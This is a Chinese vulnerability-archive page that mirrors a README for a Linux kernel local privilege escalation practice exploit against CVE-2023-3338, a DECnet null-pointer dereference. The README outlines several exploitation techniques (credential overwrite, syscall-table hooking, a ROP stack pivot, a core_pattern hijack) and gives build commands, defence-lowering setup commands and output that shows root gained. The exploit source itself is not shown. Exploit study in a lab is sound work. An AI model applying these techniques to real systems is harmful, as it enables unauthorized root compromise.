目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2023-3338 PoC — Linux kernel 代码问题漏洞

来源
关联漏洞
标题: Linux kernel 代码问题漏洞 (CVE-2023-3338)
Description:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel存在代码问题漏洞,该漏洞源于存在空指针取消引用,远程用户可以利用此漏洞使系统崩溃。
Description
Linux kernel LPE practice with an NPD vulnerability
介绍
# DECPwn
Practicing different Linux kernel exploitation techniques with my DECnet vulnerability and null page mapping enabled.
___
## Scenarios
- **Everything disabled**: `qemu-system-x86_64 -append "nosmap nosmep nopti nokaslr"`

  Code execution is redirected to the `output` function in userland, which invokes `commit_creds(prepare_kernel_cred(0))`.

- **Syscall Hooking**

  Swap the *mkdir* system call handler address inside the *sys_call_table* with a function resembling the one in Scenario 1.

- **SMEP and KPTI enabled**: `qemu-system-x86_64 -append "nosmap nokaslr"`

  Code execution is redirected to a stack pivot that sets _$rsp_ to a ROP chain in the null page. 

- **Usermode Helper**

  The `core_pattern` sysctl is overwritten to specify a command to run with elevated privileges when dumping core.

  The program is then interrupted with the SIGABRT signal to trigger the usermode script.

## Build
```bash
apt install libdnet
gcc -o lpe lpe.c -ldnet
gcc -o lpe-core_pattern lpe-core_pattern.c -ldnet
gcc -o lpe-nosmep lpe-nosmep.c -ldnet -no-pie
gcc -o lpe-syscall lpe-syscall.c -ldnet -no-pie
```
## Run
Configure DECnet as root:
```bash
sysctl -w vm.mmap_min_addr="0" # 0x1000
echo -n "1.10" > /proc/sys/net/decnet/node_address
```
Run the exploit as unprivileged user:
```
$ ./lpe
[*] Saved state
[*] Triggering NPD
[*] Returned to userland
[*] UID: 0, got root!
#
```
文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →